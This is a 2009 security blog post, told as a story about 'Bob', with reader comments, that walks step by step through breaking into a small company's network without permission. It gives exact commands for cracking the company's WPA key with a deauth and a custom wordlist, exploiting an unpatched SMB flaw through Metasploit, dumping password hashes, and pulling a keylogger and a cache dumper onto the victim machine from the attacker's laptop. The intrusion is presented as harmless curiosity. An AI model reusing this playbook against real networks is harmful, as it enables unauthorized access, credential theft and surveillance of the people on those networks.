Saturday, October 24, 2009

Bobs Double Penetration Adventure - Part 1

A couple of days ago a mate at work asked about the security issues surrounding computers that are connected to the company network and also to the Internet via a wifi connection. This question was perfect fodder for a Bob story I thought. So the story goes.......


Bobs a curious fella and he really likes to explore. Lately he's been learning about hacking, nothing evil, just really having a look in places that he shouldn't be looking, you know, a curiosity thing. As Bob sits at home it occurs to him that the perfect target for his hacking adventures is Walliford Fries, a chip maker based in his small town. He has nothing against Wallifords, he doesn't mean them any harm, he's just pissed off at the way the Wallifords are unloading their trucks at 5 in the morning and waking him up. So his intention is to see if he can get onto the Walliford network with some if these free hacking tools he's downloaded from the web and use Wallifords as his new playground.

Bob's not a traditional hacker, he doesn't go to the targets website and spend hours going through the detail, looking for business relationships, email address, job postings etc.. He hasn't even started looking at IP ranges and ports. All Bob has done is fire up his laptop sporting a brand new install of BackTrack4 and looked at whats about on the Wifi.



That's interesting, here he has a WPA network called WF-IT that is no doubt Walliford Fries related, After all, his house is within spitting distance of the Walliford offices. Shame its not WEP though, that could be cracked in minutes. Now Bob knows that his best bet is to customise his word list for this particular target, so he decides to scrape Wallifords website and add all those words to his wordlist.

wget -r http://www.wallifordfries.com
wyd.pl -n -o /root/temp/WF-wordlist.txt /root/www.wallifordfries.com/

cat /root/temp/WF-wordlist.txt | sort | uniq > wordlist2.txt

cat wordlist2.txt | pw-inspector -m 1 -M 20 >WF-customlist.txt


After creating his custom wordlist Bob decides to add it to an existing wordlist. As he'll need to create a hash of his wordlist to bruteforce the WPA key he just opts for his small but popular password list, if this fails he'll have to go for the bigger wordlist he likes to call "Mother", but first he'll opt for the easy option.

cat WF-customlist >>/root/temp/wordlist.txt

Bob now needs to get his wireless sniff on. He puts his wifi card into monitor mode and grabs the necessary BSSIDs of the access point and a client.

airmon-ng start wlan0 11

airodump-ng -c 11 mon0



With the BSSID of the client and the Access Point he starts his capture and saves it to a file.

airodump-ng -c 11 --bssid 00:18:F8:4B:43:86 -w /root/temp/Walliford mon0



With the capture going he sends a few de-auths packets so he can capture the 4 way handshake, this is critical for him to perform his WPA crack.

aireplay-ng -0 1 -a 00:18:F8:4B:43:86 -c 00:11:50:BB:D6:28 mon0



Great, Bob now has all he needs to begin his WPA crack. He quickly generates his hash file from the custom wordlist, hopefully all this effort will pay off.

To generate the hash he uses the genpmk tool from the cowpatty directory.

./genpmk -f /root/temp/wordlist.txt -d /root/temp/hash -s WF-IT

And to crack the key he uses cowpatty.

./cowpatty -r /root/temp/Walliford-01.cap -d /root/temp/hash -s WF-IT



Bingo! Bob got the WPA key in no time at all. He checks it by taking the card out of monitor mode and connecting to the AP.

airmon-ng stop mon0



Excellent, as soon as Bob finishes punching the air and doing his little dance he checks the wifi network for other hosts.

nmap 192.168.2.0/24 -sP



Got one, well two if you count the Linksys AP but lets focus on the one using the Belkin card for now. Wondering what ports it has open Bob puts Nmap to good use, again saving the results to a file.

nmap 192.168.2.102 -sV -oA ~/temp/wal-nmap



Bobs intention is to fire up Nessus and scan his target but first he knows a quick way to check for a vulnerability that he knows he has a working exploit for.

nmap 192.168.2.102 -PN -T4 -p139,445 -n --script=smb-check-vulns --script-args=unsafe=1



Perfect, Nmap has told Bob that he should be able to exploit the remote PC with the conficker exploit. He can't believe that Walliford still has unpatched PC's for this vulnerability. I guess the guys from pauldotcom are right. They have a firewall and they have AV so there safe right? Wrong!

Bob confirms his findings with Nessus and checks for any other vulnerabilities that he might have some fun with.



Well Nessus confirmed the vulnerability from his Nmap scan which is good but it doesn't find much else. Oh well, he saves his scan as an .nbe file so he can feed it into Metasploit.

After firing up Metasploit Bob decides to try out the db_autopwn feature to launch any exploits that it has against the ports it's found open.

db_create walliford
db_import_nessus_nbe /root/temp/walliford.nbe

db_hosts
db_autopwn -p -e -r -t




Oh and time for another crazy dance, Bob gets a session on the remote host and he can see that he's got system privileges which is always nice. He dumps out the local users hashes for some John the Ripper fun later and he checks out the route table. Superb, he can see that the remote host is also connected to the Walliford LAN.

sysinfo
getuid

hashdump




At this point Bob decides at this point to get a little interactive so he pulls up a command prompt on the compromised host.

execute -H -f cmd.exe -i

He TFTP's a couple of handy dandy files from his laptop and grabs the hashes of any domain accounts that have logged into this box. With a hostname such as PC-IT-1 he guesses these are going to be quite useful for his exploration adventures in his new playground.

tftp -i 192.168.2.101 get cachedump.exe
tftp -i 192.168.2.101 get klogger.exe

cachedump.exe




Now he decides to have a little look around on the server. He maps a drive to the IT folder and attempts to have a poke around.

net view \\server01
net use * \\server01\IT




Damn. The NTFS permissions wont allow him access. Then it dawns on him, the system account he is using doesn't have permissions on the server. Maybe not but with a hostname like PC-IT-1 the logged in user probably will have. He comes out of his session lists the processes and then migrates to a process which is running in the context of the user.

quit
ps
getuid

migrate 784

getuid




Perfect, he's migrated to the Explorer.exe process and now he's now running as James. Bob launches an interactive shell again and checks his mapped drives.

execute -H -f cmd.exe -i
net use

I:




Brilliant. Bobs got access to the IT folder. From here he can have a good poke around before he decides his next move. He's got some good old fashioned password cracking to do and times getting on so Bob decides to call t a day for now.

7 comments:

STRSHR said...

Meterpreter has got an 'upload' command for file transfers through the meterpreter session so the tftp part is just plain unnecessary.

SynJunkie said...

So it has. i guess because Bob was sitting at a command prompt at the time he thought TFTP seemed like an easier option, and Bobs all about the easy!

TAPE said...

Lovely post !

I always thorougly enjoy your hypothetical stories :)

Nice work, looking forward to part II !

Andy said...

Another great article! I've been waiting for the next one of these :)

Quick question, do you think it would be faster for Bob to run his password lists through Aircrack-ng? Or is creating the hash lookup table and
running cowpatty against that faster?

thanks

Andy

g3k said...

Nice article yet again. I appreciate your hard work!

SynJunkie said...

Hey thanks for the feedback guys.

Andy - Not sure about your Aircrack-ng question. If I get chance at the weekend i'll look into it, err i mean i'll ask Bob to look into it ;-)

Cheers

Syn

Andy said...

Excellent ;)

Looking forward to part 2!

Andy